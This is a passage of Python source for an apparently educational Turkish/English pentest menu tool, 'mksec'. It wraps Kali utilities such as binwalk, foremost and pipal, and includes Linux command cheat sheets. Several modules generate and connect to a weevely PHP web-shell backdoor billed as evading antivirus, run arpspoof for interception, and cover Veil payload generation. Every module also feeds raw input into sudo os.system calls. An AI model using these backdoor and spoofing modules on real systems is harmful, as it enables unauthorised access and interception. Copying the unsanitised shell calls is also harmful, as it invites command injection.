-f'\x1b[37m (-f : --force) ile deneyiniz.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nFILE {} YES The EXE binary file to convert \x1b[32mex: /root/Desktop/mksec.exe\x1b[37m\nOUTPUT{} YES Extension must end with .cmd \x1b[32mex: /root/Desktop/mksec.cmd\x1b[37m".format(userexe,userpayload))
elif "set file" in uinput.lower():
userexe = uinput
userexe = userexe.replace("set file ","").replace("set FILE ","").replace("SET file ","").replace("SET FILE ","").center(25)
elif "set output" in uinput.lower():
userpayload = uinput
userpayload = userpayload.replace("set output ","").replace("set OUTPUT ","").replace("SET output ","").replace("SET OUTPUT ","").center(25)
elif "run" == uinput.lower():
os.system("sudo exe2hex -x " + userexe.strip() + " -o " + userpayload.strip())
elif "run -f" == uinput.lower():
os.system("cd /opt/exe2hex/ && sudo python3 exe2hex.py -x " + userexe.strip() + " -o " + userpayload.strip())
def weevely():
def createabackdoor():
output = " "
backdoorpassword = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[create_backdoor]\033[37m\x1b[0m ")
UserInputs(uinput+"post")
if uinput.lower() == "info":
print("\x1b[1m\x1b[37m\x1b[33mWeevely\x1b[37m ile sifreli bir shell(backdoor) olusturun!")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nPASSWORD{} YES Add password \x1b[32mex: ex: passw0rd!\x1b[37m\nOUTPUT {} YES Output \x1b[32mex: /root/Desktop/backdoor.php\x1b[37m".format(backdoorpassword,output))
elif "set password" in uinput.lower():
backdoorpassword = uinput
backdoorpassword = backdoorpassword.replace("set password ","").replace("set PASSWORD ","").replace("SET password ","").replace("SET PASSWORD ","").center(25)
elif "set output" in uinput.lower():
output = uinput
output = output.replace("set output ","").replace("set OUTPUT ","").replace("SET output ","").replace("SET OUTPUT ","").center(25)
elif "run" == uinput.lower():
os.system("weevely generate " + backdoorpassword.strip() + " " + output.strip())
def backdoorlistener():
link = " "
listenerpassword = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[backdoor_listener]\033[37m\x1b[0m ")
UserInputs(uinput+"post")
if uinput.lower() == "info":
print("\x1b[1m\x1b[37m\x1b[33mWeevely\x1b[37m ile olusturdugunuz backdoor'u dinlemenizi saglar.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nPASSWORD{} YES Enter your backdoor password \x1b[32mex: ex: passw0rd!\x1b[37m\nHOST {} YES Backdoor location \x1b[32mex: http://192.168.10.8/dvwa/hackable/uploads/backdoor.php\x1b[37m".format(listenerpassword,link))
elif "set password" in uinput.lower():
listenerpassword = uinput
listenerpassword = listenerpassword.replace("set password ","").replace("set PASSWORD ","").replace("SET password ","").replace("SET PASSWORD ","").center(25)
elif "set host" in uinput.lower():
link = uinput
link = link.replace("set host ","").replace("set HOST ","").replace("SET host ","").replace("SET HOST ","").center(25)
elif "run" == uinput.lower():
os.system("weevely " + link.strip() + " " + listenerpassword.strip())
create = " FALSE "
listener = " FALSE "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[weevely]\033[37m\x1b[0m ")
UserInputs(uinput+"post")
if uinput.lower() == "info":
print("\x1b[1m\x1b[37m\x1b[33mWeevely\x1b[37m, web siteleri ya da sunucularda antivirus programlarina ve guvenlik duvarlarina yakalanmayan, sizden baskasinin gorse bile anlamayacagi sifreli shell(backdoor) olusturmamizi saglar.\nOlusturulan backdoor weevely ile dinlenebilir.\nIlk once backdoor olusturun ve ardından onu dinleyin.\nSadece tek degeri 'TRUE' yapin ve 'run' komutu ile calistirin.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nCREATE BACKDOOR {} OPT Set this value to 'TRUE' to create a backdoor \x1b[32mDefault value = FALSE\x1b[37m\nBACKDOOR LISTENER{} OPT Set this value to 'TRUE' to listen for a backdoor \x1b[32mDefault value = FALSE\x1b[37m".format(create,listener))
elif "set create backdoor" in uinput.lower():
create = uinput
create = create.replace("set create backdoor ","").replace("set CREATE BACKDOOR ","").replace("SET create backdoor ","").replace("SET CREATE BACKDOOR ","").center(25).upper()
elif "set backdoor listener" in uinput.lower():
listener = uinput
listener = listener.replace("set backdoor listener ","").replace("set BACKDOOR LISTENER ","").replace("SET backdoor listener ","").replace("SET BACKDOOR LISTENER ","").center(25).upper()
elif "run" == uinput.lower():
if create.lower().strip() == "true" and listener.lower().strip() == "false":
createabackdoor()
elif listener.lower().strip() == "true" and create.lower().strip() == "false":
backdoorlistener()
elif create.lower().strip() == "true" and listener.lower().strip() == "true":
print('\x1b[1m\x1b[31mYou cannot choose both.')
else:
print("\x1b[1m\x1b[31mYou have not selected one yet\x1b[1m")
def binwalk():
format = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[binwalk]\033[37m\x1b[0m ")
UserInputs(uinput+"fore")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mBinwalk, examines hardware software. Example: .bin, .iso etc... You can also try to examine .py files.\n\x1b[33mTR:\x1b[37mBinwalk, donanımların yazılımlarını inceler. Örnek: .bin, .iso vs... Bunun yanı sıra .py dosyalarını incelemeyi deneyebilirsiniz.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nFORMAT{} YES Type the location of the file you want to examine \x1b[32mex: /root/Desktop/mksec.bin\x1b[37m".format(format))
elif "set format" in uinput.lower():
format = uinput
format = format.replace("set format ","").replace("set FORMAT ","").replace("SET format ","").replace("SET FORMAT ","").center(25)
elif "run" == uinput.lower():
os.system("sudo binwalk -e " + format.strip())
print("Process Completed")
def bulkExtractor():
format = " "
output = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[bulk_extractor]\033[37m\x1b[0m ")
UserInputs(uinput+"fore")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mBulk Extractor analyzes disks (dev/sda2) or image (iso) files.\n\x1b[33mTR:\x1b[37mBulk Extractor, diskleri (dev/sda2) veya imaj (iso) dosyalarını analiz eder.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nFORMAT{} YES Type the location of the file you want to analyze \x1b[32mex: '/root/Desktop/debian.iso' \x1b[37mor\x1b[32m '/dev/sda2'\x1b[37m Type \x1b[32m'--my discs' \x1b[37mor \x1b[32m'-md'\x1b[37m to see your discs\nOUTPUT{} YES Output \x1b[32mex: '/root/Desktop/analysis'\x1b[37m".format(format,output))
elif "set format" in uinput.lower():
format = uinput
format = format.replace("set format ","").replace("set FORMAT ","").replace("SET format ","").replace("SET FORMAT ","").center(25)
elif "set output" in uinput.lower():
output = uinput
output = output.replace("set output ","").replace("set OUTPUT ","").replace("SET output ","").replace("SET OUTPUT ","").center(25)
elif "--my discs" == uinput.lower() or "-md" == uinput.lower():
os.system("fdisk -l")
elif "run" == uinput.lower():
os.system("bulk_extractor " + format.strip() + " -o " + output.strip() + "")
print("Process Completed")
def hashdeep():
hash = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[hashdeep]\033[37m\x1b[0m ")
UserInputs(uinput+"fore")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mGets the hash of a file. The data you will encounter will be in the following order. \n\x1b[33mTR:\x1b[37mBir dosyanın hash verisini elde eder. Karşılaşacağınız veriler aşağıdaki sırada olacaktır.\n'SIZE','md5','SHA256','FILENAME'")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nHASH {} YES Enter the file you want to get the hash data \x1b[32mex: '/root/Desktop/mksec.py'\x1b[37m".format(hash))
elif "set hash" in uinput.lower():
hash = uinput
hash = hash.replace("set hash ","").replace("set HASH ","").replace("SET hash ","").replace("SET HASH ","").center(25)
elif "run" == uinput.lower():
os.system("sudo hashdeep " + hash.strip())
print("Process Completed")
def foremost():
filetype = " "
disc = " "
output = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[foremost]\033[37m\x1b[0m ")
UserInputs(uinput+"fore")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mForemost finds extensions (.png, .exe etc...) inside disks.\n\x1b[33mTR:\x1b[37mForemost, disklerin içerisindeki uzantıları (.png, .exe vs...) bulur.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nFILETYPE{} YES Enter the file type \x1b[32mex: <png, jpeg, pdf, exe,..., all>\x1b[37m\nDISC {} YES Select your disc \x1b[32mex: '/dev/sda1'\x1b[37m Type \x1b[32m'--my discs' \x1b[37mor \x1b[32m'-md'\x1b[37m to see your discs\nOUTPUT {} YES Output \x1b[32mex: '/root/Desktop/mksec'\x1b[37m".format(filetype,disc,output))
elif "set filetype" in uinput.lower():
filetype = uinput
filetype = filetype.replace("set filetype ","").replace("set FILETYPE ","").replace("SET filetype ","").replace("SET FILETYPE ","").center(25)
elif "set disc" in uinput.lower():
disc = uinput
disc = disc.replace("set disc ","").replace("set DISC ","").replace("SET disc ","").replace("SET DISC ","").center(25)
elif "set output" in uinput.lower():
output = uinput
output = output.replace("set output ","").replace("set OUTPUT ","").replace("SET output ","").replace("SET OUTPUT ","").center(25)
elif "--my discs" == uinput.lower() or "-md" == uinput.lower():
os.system("fdisk -l")
elif "run" == uinput.lower():
os.system("sudo foremost -t " + filetype.strip() + " -i " + disc.strip() + " -o " + output.strip())
print("Process Completed")
def cutycapt():
url = " "
output = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[cutycapt]\033[37m\x1b[0m ")
UserInputs(uinput+"rep")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mTakes screenshots of websites.\n\x1b[33mTR:\x1b[37mWeb sitelerinin ekran görüntüsünü alır.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nURL {} YES Target Site \x1b[32mex: github.com\x1b[37m\nOUTPUT {} YES Output \x1b[32mex: /root/Desktop/mksec.png or .jpg\x1b[37m".format(url,output))
elif "set url" in uinput.lower():
url = uinput
url = url.replace("set url ","").replace("set URL ","").replace("SET url ","").replace("SET URL ","").center(25)
elif "set output" in uinput.lower():
output = uinput
output = output.replace("set output ","").replace("set OUTPUT ","").replace("SET output ","").replace("SET OUTPUT ","").center(25)
elif "run" == uinput.lower():
os.system("sudo cutycapt --url=" + url.strip() + " --out=" + output.strip())
print("Process Completed")
def pipal():
wordlist = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[pipal]\033[37m\x1b[0m ")
UserInputs(uinput+"rep")
if uinput.lower() == "info":
print("\x1b[1m\x1b[33mEN:\x1b[37mPipal is a wordlist analysis tool. If it doesn't work with the \x1b[36m'run'\x1b[37m command, try the \x1b[36m'run -f'\x1b[37m command.\n\x1b[33mTR:\x1b[37mPipal, wordlist analiz aracıdır. \x1b[36m'run'\x1b[37m komutu ile çalışmıyorsa \x1b[36m'run -f'\x1b[37m komutunu deneyiniz.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nWORDLIST{} YES Type the word list location \x1b[32mex: /usr/share/fern-wifi-cracker/extras/wordlists/common.txt\x1b[37m".format(wordlist))
elif "set wordlist" in uinput.lower():
wordlist = uinput
wordlist = wordlist.replace("set wordlist ","").replace("set WORDLIST ","").replace("SET wordlist ","").replace("SET WORDLIST ","").center(60)
elif "run" == uinput.lower():
os.system("pipal " + wordlist.strip())
print("Process Completed")
elif "run -f" == uinput.lower():
os.system("cd /opt/pipal/ && ruby pipal.rb " + wordlist.strip())
print("Process Completed")
def arpspoof():
iface = " "
target = " "
router = " "
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[foremost]\033[37m\x1b[0m ")
UserInputs(uinput+"sniff")
if uinput.lower() == "info":
print("\x1b[1m\x1b[37m\x1b[33mForemost\x1b[37m, disklerin içerisindeki uzantıları bulur.")
elif uinput.lower() == "options":
print("\x1b[1m\x1b[33mOption\x1b[37m \x1b[33mCurrent Setting\x1b[37m \x1b[33mRequirement\x1b[37m \x1b[33mDescription\x1b[37m\n\x1b[33m=======\x1b[37m \x1b[33m===============\x1b[37m \x1b[33m===========\x1b[37m \x1b[33m============\x1b[37m\nIFACE {} YES Write your interface \x1b[32mex: eth0\x1b[37m\nTARGET {} YES Enter the IP address of the target device \x1b[32mex: 192.168.10.5\x1b[37m\nROUTER {} YES Enter the router IP address \x1b[32mex: '192.168.10.1'\x1b[37m".format(iface,target,router))
elif "set iface" in uinput.lower():
iface = uinput
iface = iface.replace("set iface ","").replace("set IFACE ","").replace("SET iface ","").replace("SET IFACE ","").center(25)
elif "set target" in uinput.lower():
target = uinput
target = target.replace("set target ","").replace("set TARGET ","").replace("SET target ","").replace("SET TARGET ","").center(25)
elif "set router" in uinput.lower():
router = uinput
router = router.replace("set router ","").replace("set ROUTER ","").replace("SET router ","").replace("SET ROUTER ","").center(25)
elif "run" == uinput.lower():
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
os.system("arpspoof -i " + iface.strip() + " -t " + target.strip() + " -r " + router.strip())
print("Process Completed")
def nessus():
os.system("clear")
while 1:
print("""\x1b[1m\x1b[36m
\x1b[7mNessus\x1b[0m\x1b[1m
\x1b[37mInstall:\x1b[36m
>> linux icin nessus indir
>> cd Download/
>> dpkg -i Nessus-6.10-debian.deb
kurulum tamamlandiktan sonra local site verecektir onu kaydetmemiz gerekir. ex: https://kali:8834/
>> service nessusd start
>> https://kali:8834/
kurulumu tamamlayalim. eger aktivasyon kodu istenirse free kaydolarak alabiliriz
\x1b[37m----------------------------------------------------------------------------------------------------------------\x1b[36m
\x1b[37mZaafiyet taramasi:\x1b[36m
>> service nessusd start
>> https://kali:8834/
>> new scan
>> advanced scan
>> istedigimiz kisimlari dolduralim ve target kismina ip adresi ya da site adresi yazalim.
>> launch
\x1b[7mpress <return> to continue\x1b[0m\x1b[1m""")
uinput = input("")
UserInputs(uinput+"vuln")
def veil():
os.system("""echo \x1b[1m\x1b[36m'
\x1b[7mVeil\x1b[0m\x1b[1m
\x1b[37mInstall:\x1b[36m
>> apt-get install veil y
\x1b[37m----------------------------------------------------------------------------------------------------------------\x1b[36m
\x1b[37mUsage:\x1b[36m
>> veil
>> update
>> list
>> 1
>> list
>> use 14
>> set LHOST <YOUR.IP.ADDR>
>> set LPORT 8080
>> generate
>> test
\x1b[7mpress <return> to continue\x1b[0m\x1b[1m'""")
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[veil]\033[37m\x1b[0m ")
UserInputs(uinput+"exp")
def find():
print("\x1b[1m\x1b[33m\x1b[7m[EN] Find Command\x1b[0m\x1b[1m\n\x1b[33mEX: find -name mert.sh\x1b[37m\nSearches for the location of the 'mert.sh' file you don't know where it is. \n\x1b[33mEX: find /etc -name local*\x1b[37m\nIt searches for all files and directories starting with 'local' in the '/etc/' directory.\n\x1b[33mEX: find -name linux -type f\x1b[37m\nLists only files with the name 'linux'.\n\x1b[33mEX: find -name linux type d\x1b[37m\nLists only directories with the name 'linux'.\n\x1b[33mEX: find -perm 777\x1b[37m\nLists files with authority '777'.\n\x1b[33mEX: find -name *.jpg\x1b[37m\nSearches for files with the '.jpg' extension. \n\x1b[33mEX: find -name *.jpg | xargs rm\x1b[37m\nThe found '.jpg' files are assigned to xargs and deleted all of them.\n\x1b[33m\x1b[1m\x1b[33m\x1b[7m[TR] Find Komutu\x1b[0m\x1b[1m\n\x1b[33mÖRN: find -name mert.sh\x1b[37m\nNerede olduğunu bilinmeyen 'mert.sh' dosyanın konumunu arar.\n\x1b[33mÖRN: find /etc -name local*\x1b[37m\n'/etc/' dizininde 'local' ile başlayan bütün dosyaları ve dizinleri arar.\n\x1b[33mÖRN: find -name linux -type f\x1b[37m\n'linux' isminin geçtiği sadece dosyaları listeler.\n\x1b[33mÖRN: find -name linux type d\x1b[37m\n'linux' isminin geçtiği sadece dizinleri listeler.\n\x1b[33mÖRN: find -perm 777\x1b[37m\n'777' yetkilendirilmesine sahip dosyaları listeler.\n\x1b[33mÖRN: find -name *.jpg\x1b[37m\n'.jpg' uzantılı dosyaları arar.\n\x1b[33mÖRN: find -name *.jpg | xargs rm\x1b[37m\nBulunan '.jpg' uzantılı dosyaları xargs'a atanır ve hepsini siler.\x1b[37")
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[find]\033[37m\x1b[0m")
UserInputs(uinput+"lin")
def grep():
print("\x1b[1m\x1b[33m\x1b[7mGrep Command\x1b[0m\x1b[1m\n\x1b[33mEX: grep 'mert' deneme.txt\x1b[37m\nIt searches for the word 'mert' in the 'txt' extension files in the directory you are in.\n\x1b[33mEX: grep -i 'mert' deneme.txt\x1b[37m\nThe '-i' eliminates case sensitivity.\n\x1b[33mEX: grep -i 'mert' *\x1b[37m\nThe '*' is the escape sequence. It searches all files but not directories.\n\x1b[33mEX: grep -ir 'mert' *\x1b[37m\nSearches in all files and directories.\n\x1b[33mEX: grep -ir 'mert' a*\x1b[37m\nIt searches for mert only in files and directories starting with 'a'.\n\x1b[33mEX: ls | grep 'mert'\x1b[37m\nLists files or directories containing 'mert'.\n\x1b[1m\x1b[33m\x1b[7mGrep Komutu\x1b[0m\x1b[1m\n\x1b[33mÖRN: grep 'mert' deneme.txt\x1b[37m\nBulunduğunuz dizindeki 'txt' uzantılı dosyalarda 'mert' kelimesini arar.\n\x1b[33mÖRN: grep -i 'mert' deneme.txt\x1b[37m\n'-i' büyük küçük harf duyarlılığını ortadan kaldırır.\n\x1b[33mÖRN: grep -i 'mert' *\x1b[37m\n'*' kaçış dizisidir. Bütün dosyalarda arar fakat dizinlerde aramaz.\n\x1b[33mÖRN: grep -ir 'mert' *\x1b[37m\nBütün dosya ve dizinlerde arar.\n\x1b[33mÖRN: grep -ir 'mert' a*\x1b[37m\nSadece 'a' ile başlayan dosya ve dizinlerde mert'i arar.\n\x1b[33mÖRN: ls | grep 'mert'\x1b[37m\nİçerisinde 'mert' olan dosya veya dizinleri listeler.\x1b[37m")
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[grep]\033[37m\x1b[0m ")
UserInputs(uinput+"lin")
def man():
print("\x1b[1m\x1b[33m\x1b[7mMan Command\x1b[0m\x1b[1m\n\x1b[33m>> mandb\x1b[37m\nUpdates the man database.\n\x1b[33m>> man -k [command]\x1b[37m\nIf we don't remember the name of the command, but we remember its function, we use it.\n\x1b[32mEX: man -k delete\x1b[36m\n\x1b[32mEX: man -k command\x1b[36m\n\x1b[32mEX: man -k kill\x1b[37m\n\x1b[1m\x1b[33m\x1b[7mMan Command\x1b[0m\x1b[1m\n\x1b[33m>> mandb\x1b[37m\nMan veritabanını günceller.\n\x1b[33m>> man -k [komut]\x1b[37m\nKomutun ismini hatırlamıyorsak ama işlevini hatırlıyorsak kullanırız.\n\x1b[32mÖRN: man -k sil\x1b[36m\n\x1b[32mÖRN: man -k command\x1b[36m\n\x1b[32mÖRN: man -k kill\x1b[37m")
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[man]\033[37m\x1b[0m ")
UserInputs(uinput+"lin")
def cli():
print("\x1b[1m\x1b[33m\x1b[7mKomut Satırı Arayüzü\x1b[0m\x1b[1m\n6 farklı konsol üzerinden çalışabiliriz. Bunlardan iki tanesi grafiksel dört tanesi komut satırı arayüzüdür. Şekli aşağıdaki grafiktedir.\n\x1b[33m>> CTRL + ALT + F3\n\x1b[33m>> ALT + F1 or ALT F2\x1b[37m (Grafiksel arayüz)\n\x1b[33m>> ALT + F3, F4, F5 or F6\x1b[37m (Komut satırı arayüzü)\x1b[34m\n|----------------------------------------------|\n| Grafiksel | Komut Satırı Arayüzü |\n|tty1 tty2 | tty3 tty4 tty5 tty6 |\n|----------------------------------------------|\x1b[37m\n\n\x1b[1m\x1b[33m\x1b[7mCommand Line Interface\x1b[0m\x1b[1m\nWe can work through 6 different consoles. Two of them are graphical and four are command line interfaces. Its shape is in the graphic below.\n\x1b[33m>> CTRL + ALT + F3\n\x1b[33m>> ALT + F1 or ALT F2\x1b[37m (Graphical interface)\n\x1b[33m>> ALT + F3, F4, F5 or F6\x1b[37m (Command line interface)\x1b[34m\n|----------------------------------------------|\n| Graphical | Command Line Interface |\n|tty1 tty2 | tty3 tty4 tty5 tty6 |\n|----------------------------------------------|\x1b[37m\n")
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[command_line_interface]\033[37m\x1b[0m ")
UserInputs(uinput+"lin")
def alc():
RandomBannerSelector()
print("\x1b[1m\x1b[37m\n01\x1b[36m English\n\x1b[37m02\x1b[36m Turkish\n\x1b[37m")
while 1:
uinput = input("\x1b[1m\033[36m[mksec]\033[36m[all_linux_commands]\033[37m\x1b[0m ")
if uinput == "1" or uinput == "01":
print("\x1b[1m\x1b[33mFile Commands\x1b[37m\n\x1b[33m=============\x1b[37m\nls –> list directory\nls -al –> list directory with hidden files\ncd [directory] –> change directory\ncd –> go to home directory\npwd –> view current directory\nmkdir [directory] –> create a new directory\nrm [file] –> delete file\nrm -r [directory] -> delete directory\nrm -f [file] –> force delete file\nrm -rf [directory] –> force delete directory\ncp [directory1] [directory2] –> copy directory1 to directory2\ncp -r [directory1] [directory2] –> copy directory1 to directory2; if index2 doesn't exist, create this\nmv [file1] [file2] –> rename or move file1 to file2. If file2 exists, move the contents of file1 into file2\nln -s [file] [link] –> create symboliclink to file or link\ntouch [file] –> create or update file\ncat > [file] –> create standard input to file\nmore [file] –> view the contents of the file\nhead [file] –> show first 10 lines of file\ntail [file] –> show last 10 lines of file\ntail -f [file] –> show last 10 lines of file and all\n\x1b[33mSystem Information\n\x1b[33m==================\x1b[37m\ndate –> show current date and time\ncal –> show this month's calendar\nuptime –> show current service time\nw –> show who is online\nwhoami –> show logged in person\nfinger [user] –> information about the user\nuname -a –> show kernel info\ncat /proc/cpuinfo –> cpu info\ncat /proc/meminfo –> memory information\nman [command] –> show manual for command\ndf –> show disk usage\ndu –> show size usage of directories\nfree –> show memory and swap usage\nwhereis [app] –> probable location of the app\nwhich [app] –> show which application directories are running by default\n\x1b[33mProcess Management\n==================\x1b[37m\nps –> show active processes\ntop –> show all processes\nkill [pid] –> kill process with pid header\nkillall proc –> End all processes with title proc *\nbg –> lists stopped or trailing tasks; resumes a stopped task in the background\nfg –> reveals the most current task\nfg [n] –> Brings task n to the front\n\x1b[33mCompression\n===========\x1b[37m\ntar cf [file.tar] [files] –> Create a file named file.tar containing the files in the directory.\ntar xf [file.tar] –> Extract file.tar\ntar czf [file.tar.gz] files –> Generate a tar file with gzip\ntar xzf [files.tar.gz] –> Extract directory with gzip\ntar cjf [file.tar.bz2] –> Prepare a tar file with bzip2\ntar xjf [file.tar.bz2] –> Extract directory with bzip2\ngzip [file] –> compress file and rename to file.gz\ngzip -d [file.gz] –> Extract file.gz back as a file\n\x1b[33mNetwork\n=======\x1b[37m\nping [host] –> ping the host and show the result\nwhois [domain] –> whois information for the domain\ndig [domain] –> DNS information for the domain\ndig -x [host] –> reverse host solution\nwget [file] –> download file\nwget -c [file] –> continue download\n\x1b[33mFile Permissions\n==============\x1b[37m\nchmod [code] [file] –> change file permissions, these permissions vary for different categories (like user, group and everyone):\n• 4 = read (r)\n• 2 = write (w)\n• 1 = execute (x)\nexamples:\nchmod 777 –> read, write, execute for everyone\nchmod 755 –> rwx is for the owner, rx is for the group and everyone.\nfor more: man chmod\n\x1b[33mSetup\n=====\x1b[37m\nInstallation from source:\n./configure\nmake\nmake install\ndpkg -i pkg.deb –> package installation (debian)\nrpm -Uvh pkg.rpm –> package installation (RPM)\n\x1b[33mSSH\n===\x1b[37m\nssh [user@host] –> connect to server as user\nssh -p [port] [user@host] –> connect to server via port as user\nssh-copy-id [user@host] –> add key for user and login with key and no password\n\x1b[33mSearch\n=====\x1b[37m\ngrep [pattern] [files] –> look for patterns in files\ngrep -r [pattern] [dir] –> search the directory recursively for the pattern\n[command] | grep [pattern] –> look for pattern in command output\nlocate [file] –> search all instances of file\n\x1b[33mShortcuts\n=========\x1b[37m\nCtrl+C –> stops the current command\nCtrl+Z –> stops the current command, resumes the command with 'fg' in front or 'bg' in back\nCtrl+D –> log out like exit\nCtrl+W –> deletes a word in a line\nCtrl+U –> deletes the entire row\nCtrl+R –> bring the last command to the front\nCtrl+P –> show last command\n!! -> repeat the last command\nexit –> log out\x1b[37m")
elif uinput == "2" or uinput == "02":
print("\x1b[1m\x1b[33mDosya Komutları\x1b[37m\n\x1b[33m===============\x1b[37m\n\nls –> dizini listele\nls -al –> dizini gizli dosyalarla birlikte listele\ncd [dizin] –> dizini değiştir\ncd –> ev dizinine git\npwd –> o anda bulunulan dizini görüntüle\nmkdir [dizin] –> yeni bir dizin oluştur\nrm [dosya] –> dosya sil\nrm -r [dizin] –> dizin sil\nrm -f [dosya] –> dosya'yı silmeye zorla\nrm -rf [dizin] –> dizini silmeye zorla\ncp [dizin1] [dizin2] –> dizin1 'i, dizin2 'ye kopyala\ncp -r [dizin1] [dizin2] –> dizin1'i, dizin2'ye kopyala; eğer dizin2 yoksa oluştur\nmv [dosya1] [dosya2] –> dosya1 'i dosya2 'ye yeniden adlandır veya taşı. eğer, dosya2 varsa, dosya1 içeriğini dosya2 içine taşı\nln -s [dosya] [link] –> dosya veya link'e semnoliklink oluştur\ntouch [dosya] –> dosya'yı oluştur veya güncelle\ncat > [dosya] –> dosya'ya standart girdi oluştur\nmore [dosya] –> dosya'nın içeriğini görüntüle\nhead [dosya] –> dosya'nın ilk 10 satırını göster\ntail [dosya] –> dosya'nın son 10 satırını göster\ntail -f [dosya] –> dosya'nın son 10 satırını ve tümünü göster\n\x1b[33mSistem Bilgisi\n\x1b[33m==============\x1b[37m\ndate –> şu anki tarih ve saati göster\ncal –> bu ayın takvimini göster\nuptime –> şu anki hizmet süresini göster\nw –> kimin online olduğunu göster\nwhoami –> oturum açan kişiyi göster\nfinger [kullanıcı] –> kullanıcı hakkında bilgi\nuname -a –> kernel bilgisini göster\ncat /proc/cpuinfo –> cpu bilgisi\ncat /proc/meminfo –> hafıza bilgisi\nman [komut] –> komut için manueli göster\ndf –> disk kullanımı göster\ndu –> dizinlerin boyut kullanımı göster\nfree –> hafıza ve swap kullanımı göster\nwhereis [uygulama] –> uygulama muhtemel yeri\nwhich [uygulama] –> varsayılan olarak hangi uygulama dizinlerinin çalıştığını göster\n\x1b[33mİşlem Yönetimi\n==============\x1b[37m\nps –> etkin işlemleri göster\ntop –> tüm işlemleri göster\nkill [pid] –> pid başlıklı işlemi sonlandır\nkillall proc –> proc * başlıklı tüm işlemleri bitir\nbg –> durdurulmuş veya arkada süren görevleri listeler; arkada durdurulmuş bir görevi kaldığı yerden sürdürür\nfg –> en güncel görevi ortaya koyar\nfg [n] –> n adlı görevi öne getirir\n\x1b[33mSıkıştırma\n==========\x1b[37m\ntar cf [dosya.tar] [dosyalar] –> dizindeki dosyaları içeren dosya.tar adında bir dosya oluştur.\ntar xf [dosya.tar] –> dosya.tar dosyasındakileri çıkar\ntar czf [dosya.tar.gz] [dosyalar] –> Gzip ile bir tar dosyası oluştur\ntar xzf [dosyalar.tar.gz] – Gzip ile dizin çıkar\ntar cjf [dosya.tar.bz2] –> Bzip2 ile bir tar dosyası hazırla\ntar xjf [dosya.tar.bz2] –> Bzip2 ile 